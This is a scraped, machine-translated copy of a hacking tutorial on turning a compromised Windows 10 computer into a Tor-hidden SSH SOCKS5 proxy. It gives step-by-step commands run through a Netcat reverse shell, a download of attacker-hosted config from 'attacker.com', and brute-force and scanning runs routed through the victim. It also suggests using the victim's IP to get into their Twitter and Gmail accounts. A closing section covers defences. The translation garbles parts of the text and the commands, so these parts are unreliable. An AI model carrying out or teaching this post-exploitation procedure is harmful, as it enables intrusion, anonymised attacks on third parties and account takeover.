قالب وردپرس درنا توس
Home / Tips and Tricks / How do I turn Windows PCs into Web proxies? «Null Byte :: WonderHowTo

How do I turn Windows PCs into Web proxies? «Null Byte :: WonderHowTo



A privileged-access hacker on a Windows 10-based computer can configure it to act as a web proxy, allowing the attacker to attack devices and services on the network via the infected computer. The tests and attacks appear to come from the Windows 10 computer, making it difficult to determine the actual location of the attacker.

The attack works with an OpenSSH server and Tor. Newer versions of Windows 10 may already have an SSH server running that will allow attackers to more easily abuse the service.

While Tor is used in my example, other tools like ngrok and Serveo may possibly act as substitutes. However, these services have not been tested, mainly because Tor connections are encrypted and private, which makes the transmission of sensitive information more secure.

Why would someone do this to my computer?

It's unbelievable what a black guy This can happen to a Windows 1

0 device that acts as a private proxy. If this happens on your computer, there is a good chance that you are not the primary target of the hacker. In enterprise environments, the compromised device acts as an infiltration system, allowing the attacker to attack other people and computers in the corporate network.

In normal home networks, hackers can use the computer as a web proxy to conduct fraudulent credit card transactions, denial-of-service attacks, or pirated content. The illegal activity appears to come from your Windows 10 device and poses a major legal threat.

The facility offers benefits for White Hat Penetration Testers. For example, it is usually difficult to use tools such as Nikto, Nmap, Patator, Curl, and TheHarvester directly from the affected device. With a proxy, these tools can be used via the Windows 10 device, which provides many opportunities to switch to other devices without connecting to the destination network.

Attack Scenario Requirements

You will need some things for this particular method.

Important Notice

In this guide, code blocks beginning with > indicate that the command should be run with PowerShell on the Windows 10 system (that is, the Netcat backdoor ). Code blocks beginning with ~ $ indicate execution of the Kali Linux command.

Is OpenSSH already installed and running?

This attack requires the installation of an SSH server. The SSH server differs from the SSH client used in most versions of Windows 10. If OpenSSH is already installed, most of the following attacks can be performed without root privileges. However, if OpenSSH is not installed, administrator rights are required to install it.

Below are some commands that can be used to determine if OpenSSH is already installed and running in the background.

First, check if the OpenSSH directory exists. If no directory exists, SSH is probably not installed.

> ls "C:  Program Files  OpenSSH " 

You can use the Get-NetTCPConnection command to quickly determine which services are ready to receive status and the number of ports you have numbered. We can see ports 22 the default ssh port is on this computer in receive state.

> Get-NetTCPConnection -State Lists

LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- - -------------
:: 49676 :: 0 Listen
:: 7680 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 22 :: 0 Listen
0.0.0.0 49676 0.0.0.0 0 Listen
0.0.0.0 5040 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
0.0.0.0 22 0.0.0.0 0 Lists 

The default port number for a particular service can be changed to any value. So the output is not 100% final.

With netstat the service using a specific port can be identified. However, the output of netstat commands took much longer than that of Get-NetTCPConnection. In some cases, it took a few minutes for netstat to finish before delivering the output to the potash system. Some advanced Get-NetTCPConnection commands can be used to indicate which services use ports. However, this seemed to be an excellent opportunity to display both options.

> netstat -ba

Active connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:22 DESKTOP-U4E0WK3: 0 LISTENING
[sshd.exe]
TCP 0.0.0.0:135 DESKTOP-U4E0WK3: 0 LISTENING
RpcSs
[svchost.exe]
TCP 0.0.0.0:445 DESKTOP-U4E0WK3: 0 LISTENING
Ownership information can not be retrieved
TCP 0.0.0.0:5040 DESKTOP-U4E0WK3: 0 LISTENING
CDPSvc
[svchost.exe]
TCP 0.0.0.0:7680 DESKTOP-U4E0WK3: 0 LISTENING
DoSvc
[svchost.exe] 

In the above edition we can clearly see that sshd.exe occupies the harbor 22 .

Finally, Get-Process is used to indicate background processing. The processes are sorted alphabetically. Scroll to section S and find the process name sshd .

> Get-Process

Processes NPM (K) PM (K) WS (K) CPU (s) ID SI Process Name
------- ------ ----- ----- ------ - - -----------
297 19 6760 24328 0.27 6104 1 ApplicationFrameHost
397 23 18056 50384 3.94 3784 0 aswEngSrv
701 24 19592 38364 12.05 3104 0 aswidsagent
4115 83 69404 40016 24.70 2336 0 AvastSvc
1888 44 22444 35008 4.30 1876 1 AvastUI

...

430 25 5924 15460 0.25 2628 0 spoolsv
98 11 1728 6664 0.05 7388 0 sshd
252 10 2524 7904 0,48 488 0 svchost
156 9 1852 7860 0.13 520 0 svchost
79 5 1040 3912 0.03 908 0 svchost 

If SSH is not found on the target system, an increased backdoor (administrator) is required to execute many of the following commands. If SSH is already running, go to step 2.

Step 1: Setting Up SSH on the Windows 10 Target Computer

All of the following commands were executed through a reverse shell. This can be set up with Netcat listeners. The compromise of a Windows 10 system to this extent has been addressed in the following articles:

1. Download the OpenSSH Installation Script

In my tests, before Invoke-WebRequest ( iwr ) to download OpenSSH binaries, the SecurityProtocol had to be defined as follows become command.

> [Net.ServicePointManager] :: SecurityProtocol = [Net.SecurityProtocolType] :: Tls12 

Download the file OpenSSH-Win64.zip from GitHub. At the time of writing, v7.9.0.0p1 beta is the latest stable release. This download can take a minute or two, depending on the network speed of the Windows 10 system. During this time, the Netcat terminal will not respond or display a progress bar. Be patient here.

> iwr https://github.com/PowerShell/Win32-OpenSSH/releases/download/v7.9.0.0p1-Beta/OpenSSH-Win64.zip -o $ env: temp  OpenSSH-Win64 .zip [19659039]. 2 Extracting the OpenSSH Archive 

PowerShell versions larger than 5.1 have a convenient decompression feature called Expand-Archive that allows the ffmpeg.zip file to be quickly unpacked into the destination's temporary directory.

> Expand Archive Path "$ env: temp  OpenSSH-Win64.zip" -DestinationPath & # 39; C:  Program Files  OpenSSH & # 39; -Force 

Expand Archive inherits the input file ( $ env: temp OpenSSH- Win64.zip ) and unpack it into ( -DestinationPath ) a new folder named C: Program Files OpenSSH .

. 3 Run the OpenSSH installation script

Install the SSH server using the provided install-sshd.ps1 script. If no errors occur after a few seconds, the terminal reports a successful installation. An error was reported in a test ("NoServiceFoundForGivenName"), but it did not seem to cause the installation to fail.

> & "C:  Program Files  OpenSSH  OpenSSH-Win64  install-sshd.ps1"

[SC] SetServiceObjectSecurity SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
The sshd and ssh-agent services were successfully installed 

4. Start the OpenSSH service

After the installation, the SSH server does not start automatically. It also does not start automatically when the system is restarted. The following command net is required to start the SSH server.

> net start sshd

The OpenSSH SSH Server service starts.
The OpenSSH SSH Server service started successfully. 

5. Verify that the OpenSSH server is running

Use Get-NetTCPConnection or Get-Process to verify that the SSH Server is running. Note the receive status of port 22.

> Get-NetTCPConnection -State Listen

LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- - -------------
:: 49676 :: 0 Listen
:: 7680 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 22 :: 0 Listen
0.0.0.0 49676 0.0.0.0 0 Listen
0.0.0.0 5040 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
0.0.0.0 22 0.0.0.0 0 Lists 

Step 2: Setting up Tor on the Windows 10 target computer

Tor can be installed if the OpenSSH server is running.

. 1 Downloading the Gate ZIP File

First, download the ZIP file containing precompiled Tor binaries and DLLs. Currently the version tor-win32-0.3.5.8.zip is the latest stable version. In the future, it may be desirable to search for newer versions on the Tor project website. Use the "Windows Expert Bundle" URL, not the tar.gz source file.

> iwr # https: //www.torproject.org/dist/torbrowser/8.0.9/tor-win32-0.3. 5.8.zip & # 39; -o $ env: temp  tor.zip 

2. Extracting Tor archive

With Expand archives, the ZIP file can be decompressed again into the temporary directory ( -DestinationPath ).

> Expand-Archive -Path $ env: TEMP  tor.zip -DestinationPath $ env: TEMP  tor  

Then change ( cd ) to the new directory tor .

> cd $ env: TEMP  tor  Tor  

Use the ls command to list the contents of the directory.

> ls

Directory: C:  Users  USERNAME  AppData  Local  Temp  Tor  Tor

Mode LastWriteTime Length Name
---- ------------- ----------
-a ---- 21.02.2013 15:31 2585371 libeay32.dll
-a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll
-a ---- 21.02.2013 15:31 clock 601445 libevent_core-2-1-6.dll
-a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll
-a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll
-a ---- 21.02.2013 15:31 278533 libssp-0.dll
-a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll
-a ---- 21.02.2013 15:31 788352 ssleay32.dll
-a ---- 21.02.2013 15:31 1007104 tor-gencert.exe
-a ---- 2/21/2019 3:31 PM 3794944 tor.exe
-a ---- 21.02.2013 15:31 107520 zlib1.dll 

3. Create Torrc Configuration File

Note that there is no " torrc" file in the output of ls . Torrc is the configuration file with instructions on how Tor should behave. In this case we would like Tor to create a new onionservice address. Anyone who has previously set up a Tor Onion service retrieves the configuration of HiddenServiceDir and HiddenServicePort in the torrc file. These values ​​are responsible for the directory where Tor stores information about the onion service and the port used by the onion service.

There were some annoying word wrapping errors in my tests when the torrc file was created with ] echo and other PowerShell cmdlets for creating files. Finally, it was easier to host the desired torrc file on a remote server and simply download it with PowerShell.

First, verify the username of the target by using the $ env variable in PowerShell. This username is required for the following Torrc configuration file.

> echo $ env: username

tokyoneon 

Now create a file named "torrc" in Kali or a virtual private server and save the torrc configuration below to the file. Alternatively, this file can be hosted on a file-sharing server or on GitHub.

 ~ $ HiddenServiceDir C:  Users  USERNMAE  AppData  Local  Temp  Tor  Gate  HS 
~ $ HiddenServicePort 22 127.0.0.1:22[19659037<4DownloadingTorrentorAnfanggerSystem

To download the torrc file, set up a simple Python3 web server to make the file accessible to all users on the network and the Internet.

 ~ $ python3 -m http.server 80 

On Windows 10, the Invoke-WebRequest command can be used again to download the Torrc configuration file. The attacker's domain may be an IP address on the Wi-Fi network, an address of a virtual private server, or a file sharing site such as GitHub.

> iwr attacker.com/torrc -o torrc 

Now use ] ls to verify that the torrc file was saved correctly.

> ls

Directory: C:  Users  tokyoneon  AppData  Local  Temp  tor  Tor

Mode LastWriteTime Length Name
---- ------------- ----------
-a ---- 21.02.2013 15:31 2585371 libeay32.dll
-a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll
-a ---- 21.02.2013 15:31 clock 601445 libevent_core-2-1-6.dll
-a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll
-a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll
-a ---- 21.02.2013 15:31 278533 libssp-0.dll
-a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll
-a ---- 21.02.2013 15:31 788352 ssleay32.dll
-a ---- 21.02.2013 15:31 1007104 tor-gencert.exe
-a ---- 2/21/2019 3:31 PM 3794944 tor.exe
-a ---- 5/7/2019 9:03 PM 99 Torrc
-a ---- 2/21/2019 3:31 PM 107520 zlib1.dll 

Then cat to read the file contents.

> cat torrc

HiddenServiceDir C:  Users  tokyoneon  AppData  Local  Temp  gate  Gate  HS 
HiddenServicePort 22 127.0.0.1:22[19659037<19459043<5StarttheTorprocess[196659035] Finally, start tor.exe with the following command. After running the command, wait for the Netcat terminal to display "Bootstrapped 100%: Done". This indicates that it started correctly. Press  Enter  on the keyboard to return to an interactive Netcat shell. 

> Start-Process -NoNewWindow -FilePath.  Tor.exe argumentList & # 39 ;, & # 39; torrc & # 39;

PS C:  Users  tokyoneon  AppData  Local  Temp  Gate  Gate> May 8, 10: 43: 43,090 [notice] Gate 0.3.5.8 (git-5030edfb534245ed) on Windows 8 [or later] with Libevent 2.1.8 stable, OpenSSL 1.0.2q, Zlib 1.2.11, Liblzma N / A and Libzstd N / A.
May 8, 10: 43: 43.152 [notice] Tor can not help you if you use it wrong! For security information, see https://www.torproject.org/download/download#warning
May 08, 10: 43: 43.699 [notice] Read configuration file "C:  Users  tokyoneon  AppData  Local  Temp  tor  Tor  torrc".
May 8, 10: 43: 43.715 [warn] The path for GeoIPFile () is relative and is resolved into C:  Users  tokyoneon  AppData  Local  Temp  tor  Tor  . Did you want that?
May 08, 10: 43: 43.715 [warn] The path for GeoIPv6File () is relative and is resolved into C:  Users  tokyoneon  AppData  Local  Temp  tor  Tor  . Did you want that?
May 08 10: 43: 43.762 [notice] Socks Listener opens at 127.0.0.1:9050
May 08 10: 43: 43.762 [notice] Opened Socks Listener at 127.0.0.1:9050
May 08 10: 43: 43.000 [notice] Bootstrapped 0%: Start
May 8, 10: 43: 43,000 [notice] Starting with the guard context "default"
May 08 10: 43: 45.000 [notice] Bootstrapped 5%: Connection to the directory server is established
May 08 10: 43: 45.000 [notice] Bootstrapped 10%: Stop the handshake with the directory server
May 08 10: 43: 48,000 [notice] Bootstrapped 15%: An encrypted directory connection is established
May 08 10: 43: 49,000 [notice] Bootstrapped 20%: Request for Network Status Consensus
May 08 10: 43: 50.000 [notice] Bootstrapped 25%: Network state consensus is loading
May 8, 10: 43: 56.000 [notice] I've learned more directory information, but not enough to build a circuit: we have no viable consensus.
May 08, 10: 43: 57,000 [notice] Bootstrapped 40%: Loading Authority Key Certificates
May 8, 10: 44: 00,000 [notice] The current consensus has no parent nodes. Tor can only create internal paths, eg. B. Paths to onion services.
May 08 10: 44: 00.000 [notice] Bootstrapped 45%: Query Relay Descriptors for Internal Paths
May 8, 10: 44: 00.000 [notice] I have learned more directory information, but not enough to build a circuit: we need more microdescriptors: we have 0/6680 and can only build 0% of the probable paths. (We have 0% of guards in weight, 0% of midpoint in weight and 0% of final weight (no exits in consensus using center) = 0% of path weight.)
May 08 10: 44: 04.000 [notice] I've learned more directory information, but not enough to build a circuit: we need more microdescriptors: we have 0/6680 and can only build 0% of the likely paths. (We have 0% of guards in weight, 0% of midpoint in weight and 0% of final weight (no exits in consensus using center) = 0% of path weight.)
May 08 10: 44: 05.000 [notice] Bootstrapped 50%: Relay descriptors for internal paths are loading
May 8, 10: 44: 06.000 [notice] The current consensus contains root nodes. Tor can build home and internal paths.
May 08 10: 44: 13.000 [notice] Bootstrapped 56%: Relay descriptors are loading
May 08 10: 44: 15.000 [notice] Bootstrapped 64%: Relay descriptors are loading
May 08 10: 44: 16.000 [notice] Bootstrapped 70%: Relay descriptors are loading
May 08 10: 44: 18.000 [notice] Bootstrapped 76%: Relay descriptors are loading
May 08 10: 44: 18.000 [notice] Bootstrapped 80%: Connection to the Tor network
May 08 10: 44: 19.000 [notice] Bootstrapped 85%: End handshake with first hop
May 08 10: 44: 23.000 [notice] Bootstrapped 90%: Construction of a gate circuit
May 08 10: 44: 28,000 [notice] Bootstrapped 100%: Done

 

6. Search Onion Address

After the start of Tor, a new directory called "HS" was created. This directory contains the hostname file with the onion address. Use cat to view the file contents.

> cat HS  hostname

w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion 

Step 3: Connecting to the OpenSSH Server via Tor

Back in Kali Linux, Tor must be installed on the Windows 10 computer [1988] to interact with the new Onion service. Installing Tor in Kali Linux

Tor can be installed in Kali with the command apt-get install -y tor but it is better to install it from the Tor project repository. This installation was covered in a recent zero-byte article on hiding SSH services from Shodan. Be sure to refer to this for detailed installation instructions.

. 2 Testing the SSH Connection

Before we start using proxy hacking tools on Windows 10, we need to make sure that the SSH server is reachable from the Kali system. The command torsocks should be included in the installation of the Tor package. If not, install it with the following command.

 ~ $ apt-get install torsocks

Read package lists ... Done
Create dependency tree
Status information is read ... Done
torsocks is already the latest version (2.3.0-2).
0 updated, 0 reinstalled, 0 removed and 0 not updated. 

Then use torsocks with ssh to connect to the SSH server running on the Windows 10 target device.

 ~ $ torsocks ssh -v -p22 user@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion 

It may take up to 60 seconds for a connection to be made several times. This slowness is common in new onion services and the coupling of SSH with Tor. When the SSH connection is made, that's great. Everything works as expected. Type exit or press ctrl + d to end the SSH session.

. 3 Enable proxy option

Open a new terminal and use the following command to create a SOCKS5 proxy port at 1337. This port number is arbitrary and can be changed to less than 65535.

 ~ $ torsocks ssh-D1337-C-p22 tokyoneon@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion

Microsoft Windows [Version 10.0.17134.706]
(c) 2018 Microsoft Corporation. All rights reserved.

tokyoneon @ DESKTOP-U4E0WK3 C:  Users  tokyoneon> 

This is a new SSH terminal. This is not meant to interact with. As long as this terminal is open, the proxy remains available. In Kali, verify that the proxy port was opened with the command ss to display the available listening ports. Note the 1337 port to 127.0.0.1 - this can be configured with Hacking Tools and Web Browsers for Proxy Requests via the hacked Windows 10 computer.

 ~ $ ss -tpl

Status Recv-Q Send-Q Local Address: Port Peer Address: Port
LISTS 0 128 127.0.0.1:1337 0.0.0.0:* User: (("ssh", pid = 5798, fd = 4)) 

Step 4: Configure the hacking tools to use the proxy

Normally SOCKS5 proxies are used to bypass content filters or act as virtual private server alternatives. In this case, hacking tools are routed through a Windows 10 computer.

Many tools can be configured for use with this proxy. Proxychains is a good example. With proxy chains, it is possible to use many command-line tools as proxy over the SSH connection.

. 1 Install Proxy Chains

Make sure that proxy chains are installed in Kali Linux. This can be achieved with the following installation command.

 ~ $ apt-get install proxychains 

By default, proxy chains are configured to anonymize proxy requests with Tor on port 9050. Therefore, the configuration file needs to be changed.

Use nano to open the proxychains.conf file. Change the very last line in the file from "socks4 127.0.0.1 9050" to "socks5 127.0.0.1 1337" and exit nano.

 ~ $ nano /etc/proxychains.conf[19659037[2Proxy-Nmap-Scans

Many users may attempt to perform Nmap scans from the Windows 10 computer once the SOCKS5 proxy has been created. Note that Nmap has limited support for built-in proxy features. Not all Nmap scan types are supported, even when coupled with proxy chains.

 ~ $ proxychains nmap -p80,22,21,443,8080,8443 -sS -T5 192.168.1.1/24

ProxyChains 3.1 (http://proxychains.sf.net)
Start Nmap 7.70 (https://nmap.org) at 2019-05-08 19:25 UTC
Nmap Scan report for 192.168.1.183
The host is active (0.00093s latency).

PORT STATE SERVICE
21 / tcp filtered ftp
22 / tcp filtered ssh
80 / tcp filtered http
443 / tcp filtered https
8080 / tcp filtered http proxy
MAC Address: 16: BE: 3F: F6: E1: 22 (Hewlett Packard)

Nmap Scan report for 192.168.1.225
The host is active (0.0023s latency).

PORT STATE SERVICE
21 / tcp closed ftp
22 / tcp open ssh
80 / tcp closed http
443 / tcp has https closed
8080 / tcp open http proxy
MAC Address: 74: B3: 4C: D2: 33: A2 (Sony)

Nmap Scan report for 192.168.1.1
The host is active (0.000044s latency).

PORT STATE SERVICE
21 / tcp closed ftp
22 / tcp closed ssh
80 / tcp open http
443 / tcp has https closed
8080 / tcp closed http proxy

Nmap finished: 256 IP addresses (3 hosts) scanned in 8.39 seconds 

3. Proxy Curl Commands

Curl is a powerful command-line tool that can be used to create various types of Web requests, and supports many different protocols and functions. This can be useful for listing the types of web servers on devices on the network. Unlike many other tools, curl has built-in SOCKS5 support, which can be called with the option - Proxy .

 ~ $ curl --proxy socks5: //127.0.0.1: 1337 -I "http://192.168.1.225"

HTTP / 1.0 200 OK
Server: SimpleHTTP / 0.6 Python / 3.6.8
Date: Thu, 09 May 2019 21:34:29 GMT
Content Type: Text / HTML; Character set = utf-8
Content Length: 1387 

Curl with Proxychains also works as expected.

 ~ $ proxychains curl http://192.168.1.225:8080

ProxyChains 3.1 (http://proxychains.sf.net)
| S chain | - <> - 127.0.0.1:1337-<>>>-192.168.1.225:8080-<><>- OK





  Directory List for / 


Directory List for /

On the server side, we see that the request came from the 192.168.1.183 IP address. This is the IP address of the Windows 10 device and not the Kali system on another network around the world.

 HTTP Serving on 0.0.0.0 Port 8080 (http://0.0.0.0:8080/) ...
192.168.1.183 - - [09/May/201921:51:51] "HEAD / HTTP / 1.1" 200 -
192.168.1.183 - - [09/May/2019 21:51:58] "GET / HTTP / 1.1" 200 - 

4. Proxy Patator Brute Force Attacks

Patator is a command line brute force tool. With proxy chains Patator can be used to force services through the Windows 10 computer. While it has not been tested, the same syntax can be used for other brute-forcing tools such as Hydra and Medusa.

Be sure to read my articles "Breaking Patator In Router Gateways" and "Network-Based Attacks with an SBC Implant" for a detailed look at the setup and use of the Patator.

 ~ $ proxychains patator ssh_login host = 192.168.1.225 port = 22 user = root password = FILE0 0 = / tmp / simple_wordlist.txt -t 1

ProxyChains 3.1 (http://proxychains.sf.net)
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-05-08 20:51 UTC
INFO -
INFO - Code Size Time | Candidate num | mesg
INFO - ------------------------------------------------ -----------------------------
INFO - 1 22 5.921 | 123456 | 1 | Authentification failed.
INFO - 1 22 5,496 | Abcdef123 | 2 | Authentification failed.
INFO - 1 22 5.619 | a123456 | 3 | Authentification failed.
INFO - 1 22 5.532 | little123 | 4 | Authentification failed.
INFO - 1 22 5.640 | nanda334 | 5 | Authentification failed.
INFO - 0 30 2.583 | tokyoneon | 6 | SSH 2.0 OpenSSH_7.9p1 Debian 5
INFO - 1 22 5.723 | abc12345 | 7 | Authentification failed.
INFO - 1 22 5.501 | Password | 8 | Authentification failed.
INFO - 1 22 5.567 | Pawerjon123 | 9 | Authentification failed. 

The server side displays the failed password estimates returned from the Windows 10 IP address (192.168.1.183). Dies ist eine weitere Bestätigung dafür, dass vom Kali-System ausgehende Angriffe ordnungsgemäß über den Windows 10-Computer weitergeleitet werden.

 sshd [1353]: Fehler beim Kennwort für root von 192.168.1.183-Port 50148 ssh2
sshd [1353]: Fehler: Maximaler Authentifizierungsversuch für Root von 192.168.1.183 Port 50148 ssh2 [preauth] überschritten
sshd [1353]: Trennen der Verbindung zum authentifizierenden Benutzer-Root-192.168.1.183-Port 50148: Zu viele Authentifizierungsfehler [preauth]
sshd [1353]: PAM 5 weitere Authentifizierungsfehler; logname = uid = 0 euid = 0 tty = ssh ruser = rhost = 192.168.1.183 user = root
sshd [1353]: PAM-Dienst (sshd) ignoriert maximale Wiederholungsversuche; 6> 3
sshd [1358]: pam_unix (sshd: auth): Authentifizierungsfehler; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50149 ssh2 [preauth]
sshd[1358]: Disconnecting authenticating user root 192.168.1.183 port 50149: Too many authentication failures [preauth]
sshd[1358]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1358]: PAM service(sshd) ignoring max retries; 6 > 3
sshd[1362]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1362]: Failed password for root from 192.168.1.183 port 50150 ssh2
sshd[1362]: Accepted password for root from 192.168.1.183 port 50150 ssh2

5. Proxy theHarvester Scans

TheHarvester is an information gathering tool intended for penetration testers in the early stages of red team engagements. It features the ability to perform virtual host verification, DNS enumeration, reverse domain searches, and IP lookups, as well as make Shodan queries.

~$ proxychains theharvester -d nmap.org -l 200 -b bing,censys,yahoo

ProxyChains-3.1 (http://proxychains.sf.net)

*******************************************************************
*                                                                 *
* | |_| |__   ___    /  /__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __| &#39;_  / _   / /_/ / _` | &#39;__  / / _ / __| __/ _  &#39;__| *
* | |_| | | | __/ / __  / (_| | |    V /  __/__  ||  __/ |    *
*  __|_| |_|___| / /_/ __,_|_| _/ ___||___/_____|_| *
*                                                                 *
* theHarvester Ver. 3.0.6                                         *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* cmartorella@edge-security.com                                   *
*******************************************************************

found supported engines
[-] Starting harvesting process for domain: nmap.org

[-] Searching in Censys:
[-] Searching in Bing:
    Searching 50 results...
    Searching 100 results...
    Searching 150 results...
    Searching 200 results...
[-] Searching in Yahoo..
    Searching 0 results...
    Searching 10 results...
    Searching 190 results...
    Searching 200 results...

Harvesting results
No IP addresses found

[+] Emails found:
------------------
fyodor@nmap.org
dev@nmap.org
c@nmap.org

[+] Hosts found in search engines:
------------------------------------

Total hosts: 6

[-] Resolving hostnames IPs...

issues.nmap.org:45.33.49.119
research.nmap.org:71.6.152.72
scanme.nmap.org:45.33.32.156
svn.nmap.org:45.33.49.119
www.nmap.org:45.33.49.119

6. Proxy Nikto Scans

Nikto is a simple web server scanner that examines a website and reports discovered vulnerabilities that can later be used to compromise the site.

While Nikto has built-in support for HTTP proxies, it can&#39;t be used with this SOCKS5 proxy. I didn&#39;t test many of Nikto&#39;s options and arguments, but simple scans seemed to function properly. Readers are encouraged to experiment with this one before performing in a real scenario.

~$ proxychains nikto -host 192.168.1.225 -port 8080 -nossl

ProxyChains-3.1 (http://proxychains.sf.net)
- Nikto v2.1.6
---------------------------------------------------------------------------
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ Target IP:          192.168.1.225
+ Target Hostname:    192.168.1.225
+ Target Port:        8080
+ Start Time:         2019-05-08 19:33:26 (GMT0)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/3.6.8
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK

7. Proxy Web Requests with Firefox

With security-focused web services, it&#39;s possible to define blacklist and whitelist rules based on MAC and IP addresses. For example, this particular router will only allow the Windows 10 computer to access the router&#39;s gateway. Attempting to access 192.168.1.1 from any other devices on the network displays the following message.

Now, it would be possible to spoof Kali&#39;s MAC and IP address to trick the router into letting us view the gateway. But it&#39;s also possible to use the SSH proxy to achieve the same goal.

Open Firefox in Kali, and enter about:preferences into the URL bar. In "General," click on the "Settings" button.

Configure the proxy settings as shown below, then click "OK."

Now, navigating to 192.168.1.1 to access the router is allowed because the router believes the requests are coming from the whitelisted Windows 10 device.

This very same concept can be applied to websites like Twitter and Gmail, making it possible to access the target&#39;s accounts without raising too many red flags. These websites will see the origin (i.e., the IP address) of the login is identical to the IP address used by the Windows 10 computer.

How to Protect Yourself (Conclusion)

It&#39;s important to note that this demonstrates only one way an attacker can use a compromised computer as a proxy. In earlier conceptions of this article, the target&#39;s router and Windows 10 firewall were modified to allow port-forwarding and remote access. This would also allow an attacker to access the SSH server from anywhere in the world.

Furthermore, admin privileges may not always be required. Tor, for example, can be downloaded and used without special rights and can be configured to forward requests to any service or port on the network — without the use of SSH servers or SOCKS5 proxies.

These attacks were tested and performed on fully-patched Windows 10 systems using Avast and AVG antivirus software — so I can&#39;t recommend those as a solution. Readers will need to actively inspect running processes, search for shady software, and monitor traffic leaving their systems.

1. Inspect Outgoing Traffic with Wireshark

Wireshark is a great packet-capturing tool that can be used to observe packets leaving the network. If Tor is being used by an attacker, for example, the Tor server can be found on ExoneraTor. Similarly, Netcat traffic will be easily detected in Wireshark captures.

Wireshark capture of an IP address (server) used by Tor relay.

2. Create Strict Firewall Rules with pfSense

While pfSense installations can be a little involved and technical, it&#39;s an excellent open-source firewall solution. It can be installed on Raspberry Pis, for example, and placed between the router and modem to monitor and capture traffic on the network.

Image via Lawrence Systems/PC Pickup/YouTube

3. Monitor Running Processes with Task Manager

This solution isn&#39;t always entirely effective. Process names can be changed or spoofed, but a lazy hacker may leave these files name as the default (i.e., "tor.exe"), making them easier to detect on a compromised Windows 10 system. Below is an example of both an OpenSSH and Tor process running in the background, easily identified with the Windows 10 Task Manager.

Stay vigilant. Never underestimate you&#39;re worth to a hacker, and continue to find new ways of protecting yourself. Follow me on Twitter @tokyoneon_ if you enjoyed this article. There&#39;s more fun hacker antics to come.

Don&#39;t Miss: Use Microsoft.com Domains to Bypass Firewalls

Cover photo by Tinh Khuong; Screenshots by tokyoneon/Null Byte




Source link